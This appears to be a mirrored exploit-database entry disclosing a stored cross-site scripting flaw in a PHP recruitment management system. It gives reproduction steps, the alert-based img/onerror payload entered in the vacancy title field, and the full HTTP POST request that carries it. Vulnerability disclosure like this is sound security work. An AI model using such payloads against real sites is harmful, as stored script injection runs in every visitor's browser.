Registercompanys recruitment management system 1.0. title stored crosssite scripting (xss)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS) # Date: 17-10-2021 # Exploit Author: Aniket Deshmane # Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip # Version: 1 # Tested on: Windows 10,XAMPP Steps to Reproduce: 1)Navigate to http://127.0.0.1/employment_application & Login with staff account . 2) Navigate to vacancies tab 3) Click on Add new . 4)Add Payload "><img src=x onerror=alert(1)> in Vacancy Title field. 5)Click on Save and you are done. It's gonna be triggered when anyone visits the application. Request:- POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------15502044322641666722659366422 Content-Length: 931 Origin: http://127.0.0.1 DNT: 1 Connection: close Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Cache-Control: no-transform -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="id" -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="title" "><img src=x onerror=alert(1)> -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="designation_id" 1 -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="slots" 1 -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="status" 1 -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="description" -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream -----------------------------15502044322641666722659366422--
Companys recruitment management system 1.0. title stored crosssite scripting (xss) Vulnerability / Exploit Source : Companys recruitment management system 1.0. title stored crosssite scripting (xss)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes